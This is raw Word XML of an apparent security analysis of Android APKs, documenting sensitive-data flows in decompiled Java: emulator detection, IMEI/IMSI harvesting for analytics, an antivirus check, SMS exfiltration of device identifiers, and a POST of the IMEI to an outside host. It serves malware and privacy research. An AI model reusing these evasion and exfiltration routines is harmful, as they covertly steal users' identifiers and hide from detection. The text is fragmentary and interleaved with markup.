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1.FingerPrint(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System Properties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Apk：91afa76cac189b982bf281ad313d77ef.apk com.gwsoft.imusic.controller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sha256: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8c679a7c57a7fbb355fb363d3784cc8380655701d482837869edd95f3a3ea470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cn.com.chinatelecom.a.a.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static boolean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(Context var0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var2) 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private static boolean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(Context var0)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(!Build.FINGERPRINT.contains(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"vbox86p/vbox86p"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!Build.FINGERPRINT.contains(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"ttVM_Hdragon/ttVM_Hdragon"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!Build.FINGERPRINT.contains(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"generic/sdk/generic"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!Build.FINGERPRINT.contains(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"generic_x86/sdk_x86/generic_x86"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if (Build.FINGERPRINT.contains("generic/google_sdk/generic")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(!Build.BRAND.contains(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"generic"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!Build.BRAND.contains(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"Android"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var2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var2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(Build.DEVICE.equals(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"Droid4X"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Build.DEVICE.equals(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"ttVM_Hdragon"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Build.DEVICE.equals(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"vbox86p"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Build.DEVICE.equals(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"generic"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Build.DEVICE.equals(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"generic_x86"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(Build.FINGERPRINT.contains(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"test-keys"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(Build.HARDWARE.equals(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"vbox86"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Build.HARDWARE.equals(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"ttVM_x86"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Build.HARDWARE.equals(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"goldfish"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(Build.HOST.contains(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"Droid4x"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Build.HOST.contains(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"ttvm"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Build.HOST.contains(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"genymobile"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(Build.MANUFACTURER.equals(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Build.MANUFACTURER.equals(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"Genymotion"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Build.MANUFACTURER.equals(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"TiantianVM"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Build.MANUFACTURER.equals(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"MIT"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(Build.MODEL.equals(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"sdk"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Build.MODEL.equals(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"Droid4X-WIN"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Build.MODEL.equals(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"TianTian"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Build.MODEL.equals(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"google_sdk"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Build.MODEL.equals(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"Android SDK built for x86"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Build.MODEL.toLowerCase().contains(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"bluestacks"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Build.MODEL.toLowerCase().contains(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"genymotion"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"Droid4X"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"ttVM_Hdragon"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"vbox86p"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"sdk"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"google_sdk"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"sdk_x86"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Build.PRODUCT.equals(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"vbox86p"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String[]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String[]{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"000000000000000"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"357139052587891"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"244853564069442"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var1 = b.b(var0)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 = var3.length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for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(var5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 &lt; var4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++var5)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(var1.equalsIgnoreCase(var3[var5]))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break;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String[]{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"15555215554"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"15555215556"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"15555215558"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"15555215560"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"15555215562"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"15555215564"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"15555215566"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"15555215568"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"15555215570"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"15555215572"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"15555215574"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"15555215576"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"15555215578"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"15555215580"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"15555215582"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"15555215584"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= b.c(var0)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 = var3.length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for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(var5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 &lt; var4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++var5)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(var3[var5].equalsIgnoreCase(var1))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break;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String[]{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"310260000000000"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= b.d(var0)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 = var3.length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for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(var5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 &lt; var4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++var5)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(var3[var5].equalsIgnoreCase(var1))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break;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(b.e(var0).equalsIgnoreCase(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"Android"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++var2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(!a() &amp;&amp; var2 &lt;=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var45 = cn.com.chinatelecom.a.a.a(var8, var9, var10);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!var45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var11.put("imsi", cn.com.chinatelecom.account.a.g.a(this.c));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cn.com.chinatelecom.account.a.g.a(android.content.Context)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a(Context var0)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String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try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var2 = ((TelephonyManager)var0.getSystemService(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getSubscriberId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catch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(Exception var1)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var2 =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?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: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2.onItemClick（Others）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Apk：91afa76cac189b982bf281ad313d77ef.apk  com.gwsoft.imusic.controller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sha256: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8c679a7c57a7fbb355fb363d3784cc8380655701d482837869edd95f3a3ea470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  <w:t xml:space="preserve">Function description: Click on any song in the song list to obtain various private information, and record this information through the open source Countly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Countly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https://github.com/Countly/countly-sdk-android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 is an innovative, real-time, open source mobile analytics application. It collects data from mobile devices, and visualizes this information to analyze mobile application usage and end-user behavior. There are two parts of Countly: the server that collects and analyzes data, and mobile SDK that sends this data. Both parts are open source with different licensing terms.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com.gwsoft.imusic.controller.diy.CuttingActivity.onItemClick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CuttingActivity.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.mCatalogSongsList !=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&amp;&amp; var3 + -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&gt;=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&amp;&amp; var3 + -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&lt; CuttingActivity.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.mCatalogSongsList.size()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a9b7c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.lv_catalog_rings.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setOnItemClickListener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OnItemClickListener()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a9b7c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onItemClick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(AdapterView&lt;?&gt; var1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View var2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, int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var3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, long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var4)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a9b7c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a9b7c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(CuttingActivity.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.mCatalogSongsList != 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null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&amp;&amp; var3 + -</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="6897bb"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1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&gt;= </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="6897bb"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0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&amp;&amp; var3 + -</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="6897bb"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1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&lt; CuttingActivity.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.mCatalogSongsList.size())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cc783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               MobclickAgent.onEvent(CuttingActivity.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this, </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="6a8759"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"activity_diy_do_re"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String.valueOf(var3))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cc783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CountlyAgent.onEvent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(CuttingActivity.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this, </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="6a8759"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"activity_diy_do_re"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highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">String.valueOf(var3))</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="cc7832"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="1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color w:val="d9d9d9"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">}}}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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">com.gwsoft.imusic.utils.CountlyAgent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static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onEvent(Context var0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var2)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HashMap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HashMap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var53 = SharedPreferencesUtil.getStringConfig(var0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"Countly"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"session"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"session"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"SID"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var4.append(var5).append(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).toString())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"start_time"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var4.append(var55).append(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).toString())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var55)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"imsi"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var55)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"encrypted_user_name"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var55)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"user_member"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var4.append(var5).append(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).toString())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"network_type"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"ip"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"page_param"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"page_name"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"platform"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"android"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"app_platform"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"android"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"app_name"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8759"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"爱听4G"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"app_version"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"imei"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var4.append(((TelephonyManager)var0.getSystemService(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getDeviceId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()).append(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).toString())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var3.put(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"channel_id"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//sink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Countly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var51.recordEvent(var1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//SINK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//Class: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="6aa84f"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ly.count.android.sdk.Countly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recordEvent(String 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Map&lt;String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String&gt;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var3)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.recordEvent(var1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0.0D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recordEvent(String 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Map&lt;String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String&gt;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double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var4)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.eventQueue_.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recordEvent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sendEventsIfNeeded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sendEventsIfNeeded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System.out.println(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"Countly====&gt;"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.eventQueue_.size())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.eventQueue_.size() &gt;=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.connectionQueue_.recordEvents(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.eventQueue_.events())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3. PackageManager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  <w:t xml:space="preserve">Apk: eecdb87679687e085f1dfe8dacbf1947.apk  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flash15.1.apk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sha256:fdaba7f032ee7ff9adf799713b25d4c2fef86ddbbe8709bf6ec021505b8f1d0d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9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Function：</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check whether the "AhnLab V3 Mobile Plus 2.0" package is installed, if it is installed, get all the RunningTasks,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  <w:t xml:space="preserve">Then take the top task and assign it to var1. If var1 is a task in the configuration file, sleep 200L and start a new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aa84f"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/Class:</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="6aa84f"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">com.qwe.service.AutBan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private boolean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judgeAV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.pm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.getPackageManager()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.listAppcations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.pm.getInstalledApplications(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8192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for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&lt;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.listAppcations.size()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++var1)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if (((String)((ApplicationInfo)this.listAppcations.get(var1)).loadLabel(this.pm)).equalsIgnoreCase("AhnLab V3 Mobile Plus 2.0"))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       return true;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!AutBan.this.judgeAV()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List var2 = ((ActivityManager)AutBan.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.getSystemService(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"activity"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getRunningTasks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var1 = ((RunningTaskInfo)var2.get(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)).topActivity.getPackageName()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Thread.sleep(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200L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ComponentName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ComponentName(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"com.a"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"com.qwe.Bridg"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 var5.setComponent(var3)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AutBan.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startActivity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(var5)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getRunningTasks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//SINK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  <w:t xml:space="preserve">4.Time:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Track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6defa616d9e4ebfb595968458ca9f350.apk  com.wukongtv.wukongtv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sha256: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3397079daa388bdbcdcc42b6834d3c792bf5c80ad24491e3893de7cfc2b11db7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https://github.com/TalkingData/AppAnalytics_SDK_Cordova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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">com.tendcloud.tenddata.n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private static int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n()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long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var0 = bl.b(ab.c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"TDpref_longtime"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"TDpref.apps_send_time.key"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Calendar var10000 = Calendar.getInstance()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 var10000.get(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*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 //day_of_year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+= var10000.get(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//hours_of_day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Math.abs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(var0 /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100L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- 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)(var2 /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&gt;=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var0 != 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)var2 ?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static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c(Context var0)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 = n()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 &gt; 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ab.h =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bq.f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 &lt;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ab.h[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6aa84f"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/Class: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="6aa84f"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">bq.f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Long[][] f(Context var0) {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Long[][] var1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Long[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][]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var31 = var3.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getRecentTasks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var32 = var31.iterator()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Record the obfuscated PackageName (running) to var1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 = var32.hasNext()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 = ((RecentTaskInfo)var32.next()).baseIntent.getComponent()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var36 = var5.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getPackageName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var6.add(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(var36))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var1[0] = new Long[var6.size()];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var1[0] = (Long[])var6.toArray(var1[0]);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Record the obfuscated ProcessName to var1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var36 = ((RunningAppProcessInfo)var32.next()).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processName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var6.add(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(var36))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var1[1] = new Long[var6.size()];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var1[1] = (Long[])var6.toArray(var1[1]);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Record the obfuscated PackageName (obtained through getPackageManager) to var1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 = var2.contains(var35.packageName)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var6.add(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(var35.packageName))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var1[2] = new Long[var6.size()];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var1[2] = (Long[])var6.toArray(var1[2]);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//Hash obfuscation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private static long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(String var0) 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long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1125899906842597L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 = var0.length()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for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 =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 &lt; var3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++var4) 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var1 = var1 *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131L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)var0.charAt(var4)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//SINK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0" w:line="308.5714285714286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The data is stored in ab.h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5.SMS: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b32ce899676610f24b8534b90b5d849b.apk  com.Ninder.gotop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sha256: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3e9916e8c9137bf5e0fd3c56cf8e282189b064bdb916787dd1a9da57ba9aa4e2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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Message.what ：User-defined message code so that the recipient can identify what this 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message is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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">com.Ninder.gotop.handleMessage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Message.what == 0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.mHandler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Handler() {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handleMessage(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Message var1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var1.what == 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TelephonyManager var5 = (TelephonyManager)Nindergwdo.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.getSystemService(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 var5.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getDeviceId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var20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=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 var5.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getSubscriberId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var6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=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byte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[]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byte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[]{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105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117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SharedPreferences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var10000 = Nindergwdo.this.getSharedPreferences(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String(var3)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byte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[]{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97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116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119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97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String var24 = var10000.getString(new String(var3), "");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var2 = var24;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var24 = Nindergwdo.decrypt(var24, "31428162");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//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Encrypt with </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="6aa84f"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">DES/CBC/PKCS5Padding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var2 = var24;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var25.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sendTextMessage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(String)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 + var20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"@"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var6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","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var24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","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var8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var19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(PendingIntent)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getDeviceId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getSubscriberId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//SINK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sendTextMessage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6.Location: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eb07368da349c50092ebc98843c5215c.apk  com.inter.apps.patqut.apk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sha256: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22c9d7738073a7ac8f9b58029057c2741e89faac76b623837db2f3a8bb2d93c5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com.inter.apps.patqut.SplashScreenActivity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!getSimCountryIso.equals("MY")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TelephonyManager var3 = (TelephonyManager)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.getSystemService(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color w:val="38761d"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">String var1 = var3.getSimCountryIso().toUpperCase(Locale.US);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color w:val="38761d"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">String var2 = var3.getNetworkOperator();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getin(String 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var2) {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"52501"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ActivitySGstepOne.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"52502"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ActivitySGstepOne.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"52507"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ActivitySGstepOne.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ActivitySGstepOne.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"51008"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MainActivity3.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"51009"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MainActivity3.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"51028"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MainActivity3.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DoubleActivity.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"ZA"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(var2.equalsIgnoreCase(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"65501"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var2.equalsIgnoreCase(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"65502"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var2.equalsIgnoreCase(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"65507"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var2.equalsIgnoreCase(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"65510"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))) {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DoubleActivityZA.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"GR"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DoubleActivity.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"CL"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DoubleActivityCL.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(!var1.equalsIgnoreCase(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"TH"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!var2.equalsIgnoreCase(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"52005"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!var2.equalsIgnoreCase(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"52018"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"TH"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Log.w(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"Senside"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"Got in AISTM carrier is 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SingleActivityAtmTH1.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"PL"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PolandMain.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"DK"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DenmarkMain.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"71610"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ActivitySinglePE.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var2.equals(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"71606"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DoubleActivity.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"CR"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ActivitySingleCR.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"AR"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(var2.contains(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"72201"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|| var2.contains(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"72207"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))) {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DoubleActivity.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"AR"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ActivitySingleAR.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"NI"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ActivitySingleNI.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"HN"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SingleActivityHN.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"GT"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ActivitySingleGT.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"PY"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ActivitySinglePY.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"CR"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"GT"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"NI"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"HN"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"PY"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"AR"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"SZ"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!var1.equals("MY")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postLoginData2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MainActivity3.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Log.w(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"Senside"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"Got in Dtac carrier is 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.getBaseContext()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ActivityDtacStart.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com.inter.apps.patqut.SplashScreenActivity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postLoginData2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String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= ((TelephonyManager)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.getSystemService(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getDeviceId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 !=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&amp;&amp; var1.length() &gt;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LoginTask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ResponseListener() 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getResponse(String var1) {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(!var1.equalsIgnoreCase(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"invalidrequest"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&amp;&amp; !var1.equalsIgnoreCase(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    Intent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(var1.equalsIgnoreCase(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"-1"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        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.credits =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MyNewScreen3.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var2.putExtra(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"LastTab"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"4"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var2.putExtra(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"Credits"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.credits)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.startActivity(var2)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.finish()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SplashScreenActivity.this.credits = var1;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Intent(SplashScreenActivity.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MyNewScreen3.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var2.putExtra(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"LastTab"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var2.putExtra("Credits", SplashScreenActivity.this.credits);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SplashScreenActivity.this.startActivity(var2);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.finish()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    Toast.makeText(SplashScreenActivity.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 error occured"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).show()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})).execute(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Void[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Runnable var3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Runnable() {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run() {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Toast.makeText(SplashScreenActivity.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"Device Not Supported"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try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var3.&lt;init&gt;()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.runOnUiThread(var3)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catch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(Exception var2) {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LoginTask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public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LoginTask(Context paramContext, String paramString, </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ResponseListener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paramResponseListener) {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  <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">context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= paramContext;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  <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">deviceId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= paramString;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  <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">responseListener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= paramResponseListener;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protected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String doInBackground(Void... paramVarArgs) {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HttpPost httpPost;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DefaultHttpClient defaultHttpClient;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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String str = </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="2900ff"/>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">""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if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(Build.VERSION.SDK_INT &gt; 9)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  StrictMode.setThreadPolicy((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new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StrictMode.ThreadPolicy.Builder()).permitAll().build());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(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="2900ff"/>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"http://bdnew.lp.badabee.com/api/users/login?imei="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  <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">deviceId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try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{ Log.w(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="2900ff"/>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"SENCIDE"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, </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="2900ff"/>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"Execute HTTP Post Request"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  String str1 = </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">inputStreamToString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(defaultHttpClient.execute(httpPost).getEntity().getContent()).toString(); str =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  Log.w(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="2900ff"/>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"SENCIDE"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);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return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this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catch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(ClientProtocolException clientProtocolException) {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null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.printStackTrace();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return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str; }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catch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(IOException iOException)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  { ((IOException)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null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).printStackTrace(); </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="7f0055"/>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="7f0055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str; }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b w:val="1"/>
                <w:color w:val="7f0055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//SINK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startActivity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7.Network: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var71 = var76.a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(var7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var70.toByteArray()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"gzip"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var12 = var71.b();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 = var12.optInt("reset", 0);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before="0" w:line="308.5714285714286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Among them, the call of var76.a is an http network request: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final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(String var1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byte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[] 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var3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var4)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var1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.c + var1 +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.b()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.e.a(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"["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var1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"]Send request("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var2.length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"bytes):"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HttpPost var5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HttpPost(var1)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var5.setHeader(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"Connection"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"Keep-Alive"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var5.removeHeaders(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"Cache-Control"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var5.removeHeaders(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"User-Agent"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.a !=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var5.addHeader(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"X-Online-Host"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.c)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var5.addHeader(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"Accept"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"*/*"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var5.addHeader(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"Content-Type"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"json"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.b.getParams().removeParameter(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"http.route.default-proxy"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.a ==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var5.addHeader(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"Content-Encoding"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var5.addHeader(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"X-Content-Encoding"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var5.setEntity(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ByteArrayEntity(var2))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HttpResponse var9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.b.execute(var5)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HttpEntity var10000 = var9.getEntity()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int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var8 = var9.getStatusLine().getStatusCode()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long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var6 = var10000.getContentLength()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.e.a(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"recv response status code:"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var8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", content length:"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var6)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var2 = EntityUtils.toByteArray(var10000)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=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Header var10 = var9.getFirstHeader(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"Content-Encoding"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(var10 !=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(var10.getValue().toUpperCase().contains(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"AES"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var1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String(com.oem.superapp.mid.a.d.a(com.oem.superapp.mid.a.d.a()).a(var4).b(var2)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(var10.getValue().toUpperCase().contains(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"RSA"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var1 = h.b(var2)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(var10.getValue().toUpperCase().contains(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"IDENTITY"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var1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String(var2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.e.a(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"recv response status code:"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var8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", content :"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return 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e(var8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var1 &gt; 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try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var75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com.oem.superapp.mid.api.b()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var75.b(var7)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var75.e(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com.oem.superapp.mid.c.a.e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(j))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var75.c(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com.oem.superapp.mid.c.a.c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(j))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var75.d(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com.oem.superapp.mid.c.a.d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(j))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var75.a(System.currentTimeMillis())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var75.a()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c.a(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"server return new mid midEntity:"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var75.toString())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var3.a(var75.toString())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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">com.oem.superapp.mid.c.a.e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(Context paramContext) {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String str = "";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str = wifiManager.getConnectionInfo().getMacAddress();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str;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com.oem.superapp.mid.c.a.c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public static String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(Context paramContext) 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String str = "";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String str1 = ((TelephonyManager)paramContext.getSystemService("phone")).getDeviceId();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return str;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com.oem.superapp.mid.c.a.d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public static String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(Context paramContext) {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String str = "";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TelephonyManager telephonyManager = (TelephonyManager)paramContext.getSystemService("phone");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color w:val="a9b7c6"/>
                <w:sz w:val="10"/>
                <w:szCs w:val="10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   str = telephonyManager.getSubscriberId();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return str;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8.IO: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fm.qingting.b.c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static boolean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(String var0) {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var2 =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Runtime.getRuntime().exec("top -n 1");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var1.&lt;init&gt;(var2.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getInputStream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var3.&lt;init&gt;(var1)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var8 = var3.readLine()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            var9 = var8.contains(var0)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           return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var9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var16 = b.a()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"/"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"ihaveadreamwatchdog"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w.a(var16)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Log.e(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"WatchDog"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"watch dog is running. Don't launch it twice."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String var1 = Environment.getExternalStorageDirectory() +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"/log.txt"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var3 =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g.a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(b.b())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var4 = a.b(b.b())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var5 = b.b().getString(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="6897bb"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2131492869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var6 = g.a().replace(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var7 = g.b()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var8 = fm.qingting.qtradio.abtest.a.a(b.b()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fm.qingting.qtradio.abtest.b.g).trim()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//SENSITIVE API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//</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="6aa84f"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Class: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="6aa84f"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">g.a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(Context var0) {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 = var3.append(var2.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getDeviceId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()).toString()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var19 = var3.append(var2.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getSimSerialNumber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()).toString()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var4 = var3.append(Secure.getString(var0.getContentResolver()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"android_id"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)).toString()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8.IO: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7371c756369b3b6c178533c3a6e6a6fe.apk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0"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Function：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When registration fails, imsi imei and other information will be recorded and pushed to the monitoring platform (MTAReport)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//Trigger condition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((RegisterResponse)var7).e() !=0  //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When registering, the message received is pushed. (RegisterResponse)var7).e() == 0 means successful registration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//IF-ELSE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BasePushMessage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9b7c6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> var7；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&lt;java.nio.channels.SocketChannel: int read(java.nio.ByteBuffer)&gt; to obtain the response heartbeat information of the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((RegisterResponse)var7).e() != 0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   var8 = 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String[]{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"guid"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com.tencent.qqlive.services.push.h.a().d()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"imsi"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ab.d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.a.getApplicationContext())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"imei"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ab.c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.a.getApplicationContext())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"appver"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AppUtils.getAppVersionName(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.a.getApplicationContext())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"vuid"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com.tencent.qqlive.services.push.h.a().e()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"isJce"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MTAReport.reportUserEvent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"push_register_error"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var8)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com.tencent.qqlive.services.push.a.a(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"PushService"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8759"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"aaa34(注册失败)"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   throw new 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SocketException(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="6a8759"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"Register failed!"</w:t>
            </w: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unt.ly/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Countly/countly-sdk-andro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